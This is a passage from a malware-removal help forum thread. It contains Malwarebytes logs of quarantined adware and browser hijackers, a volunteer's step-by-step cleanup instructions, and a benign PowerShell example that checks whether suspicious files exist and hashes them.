PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 19
PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\APPID\{8f639f6b-f8fd-476e-8cca-6f5f4cbbe467}, Quarantined, [77ce2d5a9405d561df79fdcea959c937],
PUP.Optional.Yontoo, HKLM\SOFTWARE\WOW6432NODE\CLASSES\APPID\{8F639F6B-F8FD-476E-8CCA-6F5F4CBBE467}, Quarantined, [77ce2d5a9405d561df79fdcea959c937],
PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\WOW6432NODE\APPID\{8F639F6B-F8FD-476E-8CCA-6F5F4CBBE467}, Quarantined, [77ce2d5a9405d561df79fdcea959c937],
PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\APPID\{9c16ad7b-c04f-46a1-bfe6-8cc7b28b1442}, Quarantined, [a2a399eeabee26106ced8d3ea06258a8],
PUP.Optional.Yontoo, HKLM\SOFTWARE\WOW6432NODE\CLASSES\APPID\{9C16AD7B-C04F-46A1-BFE6-8CC7B28B1442}, Quarantined, [a2a399eeabee26106ced8d3ea06258a8],
PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\WOW6432NODE\APPID\{9C16AD7B-C04F-46A1-BFE6-8CC7B28B1442}, Quarantined, [a2a399eeabee26106ced8d3ea06258a8],
PUP.Optional.Yontoo, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{F83D1872-D9FF-47F8-B5A0-49CC51E24EE8}, Quarantined, [bc8993f447525cda4db61b7c92703cc4],
PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{F83D1872-D9FF-47F8-B5A0-49CC51E24EE8}, Quarantined, [bc8993f447525cda4db61b7c92703cc4],
PUP.Optional.Yontoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{79b7274a-124a-4eeb-8ce3-f4b50e19a3f7}, Quarantined, [f94c12755148a294ea93b912020023dd],
PUP.Optional.GetNow, HKLM\SOFTWARE\CLASSES\INTERFACE\{237FDFDB-3722-470E-8BA8-90196DABE967}, Quarantined, [04414c3b9cfd6bcb6f07b109a55d9e62],
PUP.Optional.GetNow, HKLM\SOFTWARE\CLASSES\TypeLib\{F126C9FC-9299-40F2-BD42-C59023AD1E7F}, Quarantined, [bd88dbac940539fd1f57ab0f867ce61a],
PUP.Optional.GetNow, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{237FDFDB-3722-470E-8BA8-90196DABE967}, Quarantined, [bd88dbac940539fd1f57ab0f867ce61a],
PUP.Optional.GetNow, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{237FDFDB-3722-470E-8BA8-90196DABE967}, Quarantined, [bd88dbac940539fd1f57ab0f867ce61a],
PUP.Optional.GetNow, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TypeLib\{F126C9FC-9299-40F2-BD42-C59023AD1E7F}, Quarantined, [6bda285f2b6e90a697df5e5c23df916f],
PUP.Optional.GetNow, HKLM\SOFTWARE\CLASSES\WOW6432NODE\TypeLib\{F126C9FC-9299-40F2-BD42-C59023AD1E7F}, Quarantined, [b98cc6c16a2fe551c0b616a4fe0458a8],
PUP.Optional.Yontoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{CC7D093D-4ABE-474B-A201-7825CE0EADA6}, Quarantined, [4df85d2a6336d36374740930f113ee12],
PUP.Optional.SafeSear.ShrtCln, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ECD8BB97-F6CB-11E4-8279-40E2304EF1BE}, Quarantined, [87be582f8910f343d39d3de3c53ea759],
PUP.Optional.InstallCore, HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\SOFTWARE\InstallCore, Quarantined, [57eee0a71980b284320b9579c34137c9],
PUP.Optional.Yontoo, HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, Quarantined, [48fd41460693f145b1368faaf70d738d],

Registry Values: 6
PUP.Optional.Yontoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES|DoNotAskAgain, searchinterneat-a.akamaihd.net, Quarantined, [e560394e2e6b3501dfe50c2f48bc0ff1]
PUP.Optional.Yontoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{CC7D093D-4ABE-474B-A201-7825CE0EADA6}|URL, http://searchinterneat-a.akamaihd.n...EURNNfXZNE2oUQEdAKG5RD10eVg==&q={searchTerms}, Quarantined, [4df85d2a6336d36374740930f113ee12]
PUP.Optional.SafeSear.ShrtCln, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ECD8BB97-F6CB-11E4-8279-40E2304EF1BE}|TopResultURLFallback, http://www.safesear.ch/web/?type=20151102-120-sshome-ie-df&q={searchTerms}, Quarantined, [87be582f8910f343d39d3de3c53ea759]
PUP.Optional.SafeSear.ShrtCln, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ECD8BB97-F6CB-11E4-8279-40E2304EF1BE}|URL, http://www.safesear.ch/web/?type=20151102-120-sshome-ie-df&q={searchTerms}, Quarantined, [0540e5a296037eb889e7c35d996ab14f]
PUP.Optional.Yontoo, HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES|DoNotAskAgain, searchinterneat-a.akamaihd.net, Quarantined, [4df8aadd5e3b7fb750b171ca55af37c9]
PUP.Optional.Yontoo, HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|URL, http://searchinterneat-a.akamaihd.n...EURNNfXZNE2oUQEdAKG5RD10eVg==&q={searchTerms}, Quarantined, [48fd41460693f145b1368faaf70d738d]

Registry Data: 8
PUP.Optional.SafeSear.ShrtCln, HKLM\SOFTWARE\CLIENTS\STARTMENUINTERNET\FIREFOX.EXE\SHELL\OPEN\COMMAND, "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" http://www.safesear.ch/?type=20151102-120-ff-sm, Good: (firefox.exe), Bad: ("C:\Program Files (x86)\Mozilla Firefox\firefox.exe" http://www.safesear.ch/?type=20151102-120-ff-sm),Replaced,[23223a4dd7c23501e7aa38d9d43148b8]
PUP.Optional.Yontoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|Start Page, http://searchinterneat-a.akamaihd.n...FIk0FA1ADB0VXfVBdFElXTwhsNUtrBFgDQl10KVdcDk4=, Good: (www.google.com), Bad: (http://searchinterneat-a.akamaihd.n...0VXfVBdFElXTwhsNUtrBFgDQl10KVdcDk4=),Replaced,[d66f6a1ddcbdfe381ec651c3a1647987]
PUP.Optional.SafeSear.ShrtCln, HKLM\SOFTWARE\WOW6432NODE\CLIENTS\STARTMENUINTERNET\FIREFOX.EXE\SHELL\OPEN\COMMAND, "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" http://www.safesear.ch/?type=20151102-120-ff-sm, Good: (firefox.exe), Bad: ("C:\Program Files (x86)\Mozilla Firefox\firefox.exe" http://www.safesear.ch/?type=20151102-120-ff-sm),Replaced,[4ef7a4e307929e981f72d9383ec7669a]
PUP.Optional.SafeSear.ShrtCln, HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|Search Page, http://www.safesear.ch/web/?type=20151102-120-sshome-ie-df&q={searchTerms}, Good: (www.google.com), Bad: (http://www.safesear.ch/web/?type=20151102-120-sshome-ie-df&q={searchTerms}),Replaced,[5aeb384f2b6e57df622d38d914f118e8]
PUP.Optional.SafeSear.ShrtCln, HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|Default_Page_URL, http://www.safesear.ch/?type=20151102-120-ie, Good: (www.google.com), Bad: (http://www.safesear.ch/?type=20151102-120-ie),Replaced,[79cc800738614bebf39c6da43fc6c33d]
PUP.Optional.SafeSear.ShrtCln, HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|Search Bar, http://www.safesear.ch/web/?type=20151102-120-sshome-ie-df&q={searchTerms}, Good: (www.google.com), Bad: (http://www.safesear.ch/web/?type=20151102-120-sshome-ie-df&q={searchTerms}),Replaced,[bc8906818910ab8b9df26da49a6b07f9]
PUP.Optional.SafeSear.ShrtCln, HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCH|Default_Search_URL, http://www.safesear.ch/web/?type=20151102-120-sshome-ie-df&q={searchTerms}, Good: (www.google.com), Bad: (http://www.safesear.ch/web/?type=20151102-120-sshome-ie-df&q={searchTerms}),Replaced,[a5a01e697b1e85b1523ece43e0256a96]
PUP.Optional.SafeSear.ShrtCln, HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCH|SearchAssistant, http://www.safesear.ch/web/?type=20151102-120-sshome-ie-df&q={searchTerms}, Good: (www.google.com), Bad: (http://www.safesear.ch/web/?type=20151102-120-sshome-ie-df&q={searchTerms}),Replaced,[c2830a7d5a3fdc5a37593fd2b84d837d]

Folders: 5
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser\Application, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.DriverRestore, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverRestore, Quarantined, [ea5b3f484059ba7cc4deda36649f8b75],
PUP.Optional.Yontoo, C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pakhbmhdgddbmkdbfbdaeeeajphlpdib\1.0.5909.31489_0, Quarantined, [65e01d6a1f7a52e433c42e11996cba46],
PUP.Optional.Yontoo, C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pakhbmhdgddbmkdbfbdaeeeajphlpdib, Quarantined, [65e01d6a1f7a52e433c42e11996cba46],

Files: 25
PUP.Optional.Amonetize, C:\Users\Jackie\Downloads\Unconfirmed 818780.crdownload, Quarantined, [b68f6126643578be2f13027d956cde22],
PUP.Optional.APNToolBar, C:\Users\Jackie\Downloads\pal_install_r132144 (1).exe, Quarantined, [4afbe99eb0e9dc5a35b25ae481804ab6],
PUP.Optional.APNToolBar, C:\Users\Jackie\Downloads\pal_install_r132144 (2).exe, Quarantined, [7bca8ef91188db5b5691fc42c43d53ad],
PUP.Optional.APNToolBar, C:\Users\Jackie\Downloads\pal_install_r132144 (3).exe, Quarantined, [0a3b3c4bcfcaa294e106b48aeb16956b],
PUP.Optional.APNToolBar, C:\Users\Jackie\Downloads\pal_install_r132144 (4).exe, Quarantined, [fb4a285f9702e94d29bed06e7190748c],
PUP.Optional.APNToolBar, C:\Users\Jackie\Downloads\pal_install_r132144.exe, Quarantined, [78cd7d0af0a9a6905196c27cf011847c],
PUP.Optional.Yontoo, C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_oursearchwindow-a.akamaihd.net_0.localstorage, Delete-on-Reboot, [60e581067e1b10267555f08b20e45da3],
PUP.Optional.Yontoo, C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_oursearchwindow-a.akamaihd.net_0.localstorage-journal, Delete-on-Reboot, [3c097a0ddebb3cfa478388f3f90be21e],
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser\Application\am.ico, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser\Application\ch.ico, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser\Application\cl.ico, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser\Application\eb.ico, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser\Application\es.ico, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser\Application\fb.ico, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser\Application\ff.ico, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser\Application\gm.ico, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser\Application\ie.ico, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser\Application\nf.ico, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser\Application\search.ico, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser\Application\yt.ico, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.Yontoo, C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pakhbmhdgddbmkdbfbdaeeeajphlpdib\1.0.5909.31489_0\manifest.json, Quarantined, [65e01d6a1f7a52e433c42e11996cba46],
PUP.Optional.Yontoo, C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pakhbmhdgddbmkdbfbdaeeeajphlpdib\1.0.5909.31489_0\background.js, Quarantined, [65e01d6a1f7a52e433c42e11996cba46],
PUP.Optional.Yontoo, C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pakhbmhdgddbmkdbfbdaeeeajphlpdib\1.0.5909.31489_0\content.js, Quarantined, [65e01d6a1f7a52e433c42e11996cba46],
PUP.Optional.Yontoo, C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pakhbmhdgddbmkdbfbdaeeeajphlpdib\1.0.5909.31489_0\icon.png, Quarantined, [65e01d6a1f7a52e433c42e11996cba46],
PUP.Optional.Yontoo, C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences, Good: ("session":{"restore_on_startup":4,"startup_urls":["https://www.malwarebytes.org/restorebrowser/"]}}), Bad: ("session":{"restore_on_startup":4,"restore_on_startup_migrated":true,"startup_urls":["http://searchinterneat-a.akamaihd.n...FIk0FA1oDB0VXfV5bFElXTwhsNUtrBFgDQl10KVdcDk4=","http://google.com/"],"urls_to_restore_on_startup":["http://searchinterneat-a.akamaihd.n...FIk0FA1oDB0VXfV5bFElXTwhsNUtrBFgDQl10KVdcDk4="]}}), Replaced,[5aeb5d2ae2b7cd69516edd64b64f728e]

Physical Sectors: 0
(No malicious items detected)

(end)
 
#13 ·
Here is the second of two MBAM logs:

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 3/13/2016
Scan Time: 3:52 AM
Logfile: malbytes 2.txt
Administrator: Yes

Version: 2.2.0.1024
Malware Database: v2016.03.13.01
Rootkit Database: v2016.03.12.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 10
CPU: x64
File System: NTFS
User: Jackie

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 353847
Time Elapsed: 25 min, 46 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 3
PUP.Optional.Yontoo, C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_oursearchwindow-a.akamaihd.net_0.localstorage, Quarantined, [61e4aaddbbde84b2903a0675f3116c94],
PUP.Optional.Yontoo, C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_oursearchwindow-a.akamaihd.net_0.localstorage-journal, Quarantined, [52f37e099504ae888842bfbc000446ba],
PUP.Optional.Yontoo, C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences, Good: ("session":{"restore_on_startup":4,"startup_urls":["https://www.malwarebytes.org/restorebrowser/"]}}), Bad: ("session":{"restore_on_startup":4,"restore_on_startup_migrated":true,"startup_urls":["http://searchinterneat-a.akamaihd.n...FIk0FA1oDB0VXfV5bFElXTwhsNUtrBFgDQl10KVdcDk4=","http://google.com/"],"urls_to_restore_on_startup":["http://searchinterneat-a.akamaihd.n...FIk0FA1oDB0VXfV5bFElXTwhsNUtrBFgDQl10KVdcDk4="]}}), Replaced,[a99c1a6d9dfcc96d982782bf719404fc]

Physical Sectors: 0
(No malicious items detected)

(end)
 
#14 ·
In your next reply please include:
  • Did you have any problems with the instructions?
  • FRST.txt
  • Addition.txt
  • AdwCleaner[S1].txt
  • The MBAM logs
  • Are there any changes in computer behavior?
The only problem that I had was copying the MBAM logs to clipboard. So, I copied them to a .txt file.
I did feel unsure of myself throughout this process, so I hope I did everything ok for you. If I did not, let me know.

Thank you for all of your help capnkrunch. Btw, luv the dog in your profile pic. I luv dogs.
 
#15 ·
Hello jj832 :)

Thank you very much for taking on my case.
You're welcome. Apologies for the delay and thanks for your patience.

During this scan, towards the beginning of the scan, my McAfee antivirus quarantined a trojan called "Artemis."
Thanks for letting me know. Artemis is a generic McAfee detection. Basically they found something suspicious but it doesn't quite match anything in their database. It's possible this was a false positive of part of FRST.

I did feel unsure of myself throughout this process, so I hope I did everything ok for you.
Don't worry, you did everything perfectly. In the future, don't hesitate to stop and ask if anything is unclear or you're not sure how to do something. I would much rather take all the time necessary to answer all your questions than break something because my instructions were not clear enough.

How about this? I will try to keep future instruction sets shorter; only one or two steps. That should make things a bit more manageable.

I will review your logs and provide the next set of instructions when I'm home from work.

The husky is my baby, Molly. If you think that picture is cute, you should see how stunning she is in person. :D

Regards,
-capnkrunch
 
#17 ·
Hello jj832 :)

Let's start off by making a backup of your registry. This will give us something to restore to in case something goes wrong.

Create a Backup With Tweaking.com Registry Backup (TCRB)
There is also a tutorial with pictures available HERE.
  • Download TCRB from HERE and save it to your Desktop.
  • Double-click on tweaking.com_registry_backup_setup.exe and follow the prompts to install TCRB.
  • Launch TCRB.
  • Click the Backup Registry tab and make sure all the boxes are checked.
  • Click on Backup Now.
  • Once the backup is finished you can now exit the program.

Also, please answer the following questions:

Do you recognize the following Chrome extensions? Were they installed voluntarily?
Chrome Remote Desktop
Printiki


Please post each log separately to prevent it being cut off by the forum post size limiter.
Check each after you've posted it to make sure it's all present; if any log is cut off you'll have to post it in sections...

In your next reply please include:
  • Did you have any problems with the instructions?
  • Were you able to successfully make a registry backup with TCRB?
  • An answer to my question about Chrome extensions
  • Are there any changes in computer behavior?
 
#18 ·
Ok, I did the backup with TCRB.

Also, in answer to your question: I did download Chrome Remote Desktop and Printiki. But, I don't use them and did not bother to figure out how to get rid of them.

Do you want me to post the TCRB backup registry results? I do not think that you do.

I had no problems with the instructions. Making the registry backup with TCRB was easy. My computer is running fine. No changes.

I just started playing Scrabble on Facebook. That game is running extremely slow. That is the only problem.

Thank you, capnkrunch
 
#19 ·
Hello jj832 :)

Also, in answer to your question: I did download Chrome Remote Desktop and Printiki. But, I don't use them and did not bother to figure out how to get rid of them.
That's OK. Once we're finished I can give you instructions for uninstalling Chrome extensions.

Do you want me to post the TCRB backup registry results? I do not think that you do.
You are correct, I only needed to know that you were able to do it successfully.

Step one...

Show Hidden Files and Folders
  • Click Start and then click Control Panel.
  • Click Appearance and Personalization, and then click Folder Options.
  • Click on the View tab.
  • Check Show hidden files, folders, and drives and uncheck Hide extensions for known file types.
  • Click OK.

Step two...

Upload Files to VirusTotal
  • Please go to VirusTotal.
  • Click the Choose File button.
  • Navigate to one of the following files:
    C:\Program Files (x86)\Windriver\Scheduler.Service.exe
    C:\WINDOWS\system32\bitst.exe
    C:\Windows\system32\DRIVERS\13114cc54a946f641c081c84a88f491d.sys
  • Click the Scan it! button.
  • You might see a message saying File already analysed, if you do click Reanalyse.
  • Wait for all the scans to finish then copy and paste the web address from your browser's address bar.
    Example of web address :
  • Include the link in your next reply.
  • Repeat for each of the listed files.
    Do not worry if you cannot find one or more of the files, just let me know which one(s).

Please post each log separately to prevent it being cut off by the forum post size limiter.
Check each after you've posted it to make sure it's all present; if any log is cut off you'll have to post it in sections...

In your next reply please include:
  • Did you have any problems with the instructions?
  • The VirusTotal links
  • Are there any changes in computer behavior?
 
#20 ·
I am so sorry. I tried, but I could not make this set of instructions work.(n)

I did step 1, no problem. On step 2, I clicked on Virus Total, then clicked on the choose file button. The files aren't listed in my computer like you have them.

When I click on the choose file button, it opens to "This PC>Downloads." So, I went down the list on the left and chose TI10700000B (C:).

I went down the list on that and clicked on Program Files (x86). Next there is a list, all file folders, Adobe, Amazon, AntiRansomware 2.0, Apple Software Update, Atheros, Bluetooth Suite, common files, Game Top.com, Google, Install Shield Installation Information, and so on and so on. At this point, I am just lost as to how to make this work.

So sorry, capn. What should I do next? Thank you.
 
#21 ·
Hello jj832 :)

Under the Program Files (x86) folder do you see a folder named Windriver? If so click on it and look for a file named Scheduler.Service.exe. It's possible that there is no Windriver folder. If that's the case simply move on to the next file.

For the other two files, the folders should at least exist. If you can't find the file inside, just move on. Try all three; if you can't find any, that's fine, just let me know. If you can't open or find the folders, that's also fine, but make sure to tell me.

There are other ways to investigate these files, so worst case scenario we just move on and try something else.

Regards,
-capnkrunch
 
#22 ·
Another thought: it may be easier to check if the files exist in File Explorer first.
  • Click Start and then File Explorer.
  • Copy and paste the file path minus the file name into the address bar and press Enter. For example C:\WINDOWS\system32.
  • Click anywhere inside the folder.
  • Type the first few letters of the file name. For example, bit.
  • If you see the file then try to upload it to VirusTotal. If not move on to the next one.
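
The same existence check can be scripted. The following PowerShell is an added example, not part of the original posts: for each of the three paths listed in post #19 it reports whether the file is present (hidden and system files included), the deepest folder on the path that does exist, and the file's SHA-256, which can be pasted into VirusTotal's search box instead of uploading the file. The function name Get-SuspectFileReport is made up for this example.

```powershell
# Paths copied from the helper's list in this thread.
$paths = @(
    'C:\Program Files (x86)\Windriver\Scheduler.Service.exe',
    'C:\WINDOWS\system32\bitst.exe',
    'C:\Windows\system32\DRIVERS\13114cc54a946f641c081c84a88f491d.sys'
)

# A 32-bit process on 64-bit Windows is silently redirected from
# System32 to SysWOW64; the Sysnative alias reaches the real folder.
$redirected = [Environment]::Is64BitOperatingSystem -and
              -not [Environment]::Is64BitProcess

function Get-SuspectFileReport {   # hypothetical helper name
    param([string[]]$Path)
    foreach ($p in $Path) {
        $real = $p
        if ($redirected) {
            $real = $p -ireplace '\\system32\\', '\Sysnative\'
        }

        # Walk up to the deepest folder that exists, so the report
        # shows how far along the path the file system agrees.
        $dir = Split-Path -Path $real -Parent
        while ($dir -and -not (Test-Path -LiteralPath $dir)) {
            $dir = Split-Path -Path $dir -Parent
        }

        # -Force makes hidden and system files visible to Get-Item.
        $item = Get-Item -LiteralPath $real -Force -ErrorAction SilentlyContinue
        $hash = $null
        if ($item) {
            # Hashing can fail on a locked file; SHA256 then stays empty.
            $hash = (Get-FileHash -LiteralPath $real -Algorithm SHA256 `
                        -ErrorAction SilentlyContinue).Hash
        }

        [pscustomobject]@{
            Path          = $p
            Exists        = [bool]$item
            DeepestFolder = $dir
            Attributes    = if ($item) { $item.Attributes } else { $null }
            SHA256        = $hash
        }
    }
}

Get-SuspectFileReport -Path $paths | Format-List
```

Exists = False together with a DeepestFolder that stops at the parent folder means the file is not at that location for the account running the script; it does not by itself show that the file never existed.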
 
#23 ·
I am so sorry Capnkrunch.

I have tried the best that I can all day to find these files, and I am not finding them.

C:\Program Files (x86)\Windriver\Scheduler.Service.exe - I get as far as Program Files (x86)

C:\WINDOWS\system32\bitst.exe - I get as far as system 32

C:\Windows\system32\DRIVERS\13114cc54a946f641c081c84a88f491d.sys - I get as far as drivers.

I used search over and over again. I have tried to make out the shorthand of the files. I have attempted to put them in a document and attach them here. I am sorry that I am just not getting this step.

:cry: Jackie
 